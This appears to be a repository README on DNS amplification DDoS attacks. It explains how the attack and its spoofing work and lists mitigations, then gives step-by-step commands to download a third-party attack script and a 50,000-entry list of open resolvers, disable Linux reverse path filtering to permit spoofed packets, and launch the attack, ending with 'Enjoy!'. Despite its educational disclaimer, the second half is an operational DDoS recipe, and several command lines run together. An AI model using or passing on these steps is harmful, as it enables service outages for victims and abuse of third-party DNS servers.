A basic guide to simulate DNS amplification.
This repository is created and maintained for educational purposes only. It is intended to provide learning resources, demonstrate concepts, and support research in cybersecurity, network protocols, or related fields.
Use responsibly: The code and information provided in this repository should never be used for malicious purposes or any unauthorized activity. The owner of this repository disclaims any liability for misuse of the information or code contained herein. All users are responsible for ensuring their use of this content complies with applicable laws, regulations, and ethical guidelines.
If you are using this repository for testing or development purposes, please do so only in a controlled environment where you have explicit permission to do so (e.g., your own private network, lab setup, or properly authorized systems).
Respect others' rights and privacy by refraining from using this repository for any activity that could disrupt services, invade privacy, or cause harm to individuals or organizations.
Thank you for using this repository responsibly and for contributing to a safer, more informed community.
A DNS amplification attack is a type of Distributed Denial of Service (DDoS) attack where attackers exploit open DNS resolvers to overwhelm a target system or network with a massive amount of traffic. This attack takes advantage of the fact that DNS queries can be very small, but the responses can be significantly larger. By "amplifying" the amount of data sent to a victim, attackers can magnify their impact without needing a large amount of resources.
Attackers look for open DNS resolvers—DNS servers that respond to queries from any IP address, not just those on a specific network. Many DNS servers are intentionally configured as open resolvers for public access, but they can be exploited if not properly secured.
The attacker crafts a DNS request that has a spoofed source IP address—specifically, the IP address of the intended victim. When the DNS resolver receives the request, it thinks it came from the victim’s IP address.
The attacker sends small DNS queries to the open DNS resolvers. These queries are crafted to return large responses (usually by requesting information about DNS records with lots of data, such as the ANY record type). For example, a 60-byte DNS query could produce a 4,000-byte response, resulting in an amplification factor of about 70 times.
Since the DNS requests are sent with the victim’s IP address, the open DNS resolvers send the large DNS responses directly to the victim’s server or network. Because multiple DNS resolvers are often used, this can result in massive volumes of traffic directed at the victim in a very short time.
The victim's server or network can be overwhelmed by this traffic, leading to:
Bandwidth exhaustion: The target’s internet connection becomes saturated, slowing down or blocking legitimate traffic. Resource exhaustion: The target’s server may run out of processing power or memory, causing it to crash or become unresponsive.
Amplification Factor: By using small DNS queries that result in large responses, attackers can amplify their impact without needing significant resources.
Anonymity: Attackers can use spoofed IP addresses, making it difficult to trace the attack back to its source.
High Availability of Open Resolvers: Thousands of improperly configured DNS resolvers are available on the internet, making them easy to exploit.
Let’s say an attacker wants to target a website with IP address 203.0.113.5.
The attacker sends a DNS query to multiple open DNS resolvers, requesting information about a large record (like ANY) but using the IP address 203.0.113.5 as the source address.
Each DNS resolver receives the small query and sends a much larger response to 203.0.113.5 (the victim).
The victim receives a flood of these large responses from multiple DNS resolvers, overwhelming their server or network.
DNS Server Configuration: Configure DNS servers to only respond to queries from trusted IP addresses and disable support for the ANY query type, which often generates large responses.
Rate Limiting: Implement rate limiting on DNS servers to restrict the number of responses sent to any single IP address in a given period.
IP Spoofing Prevention: ISPs can implement egress filtering to block packets with spoofed IP addresses, which can prevent attackers from spoofing the victim’s IP.
Use of DNSSEC: DNSSEC (DNS Security Extensions) can help by ensuring the integrity of DNS responses, though it does not directly prevent amplification attacks.
Deploying Firewalls and Anti-DDoS Services: Firewalls and anti-DDoS services can detect and mitigate unusually high volumes of DNS responses directed at a single IP.
DNS amplification attacks exploit the design of DNS and the openness of many DNS resolvers on the internet. By leveraging both the amplification effect and IP spoofing, attackers can create a powerful and hard-to-trace DDoS attack.
Let's get started by installing the basic components for performing a DNS amplification attack. Please follow the steps below.
mkdir dnsamp
cd ./dnsamppython3 -m venv venv
source venv/bin/activate
pip install scapycurl https://raw.githubusercontent.com/lilmond/Ultimate-DNSAmp/refs/heads/main/dnsamp.py > dnsamp.py
curl https://raw.githubusercontent.com/lilmond/Nameservers_50k/refs/heads/main/nameservers_50k.txt > nameservers_50k.txtThis is important to allow IP spoofing in your network. Also, please note that this doesn't work for all types of devices, so I recommend using a dedicated server.
Enabling spoofed packets is generally not recommended, as spoofing refers to forging the source IP address of packets, which is commonly associated with malicious activities (e.g., DDoS attacks, man-in-the-middle attacks). Allowing or enabling spoofed packets can also lead to network security vulnerabilities and routing issues.
However, if you're configuring a lab environment or have a legitimate reason for simulating spoofed traffic (e.g., for testing and educational purposes), you can configure iptables to permit packets with mismatched or unexpected source IPs. Be very cautious when doing this, and only do it in a controlled environment, as it bypasses a common security measure.
Linux has a built-in mechanism called reverse path filtering that prevents spoofed packets by ensuring that incoming packets on an interface have a source IP address reachable through that same interface. To allow spoofed packets, you need to disable this filtering.
To disable reverse path filtering, you can run:
# Disable reverse path filtering
echo 0 | sudo tee /proc/sys/net/ipv4/conf/all/rp_filternet.ipv4.conf.all.rp_filter = 0
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.eth0.rp_filter = 0 # Replace eth0 with your interface
Then apply the changes with:
sudo sysctl -pAnd finally, you can run the script:
python3 dnsamp.pyEnjoy!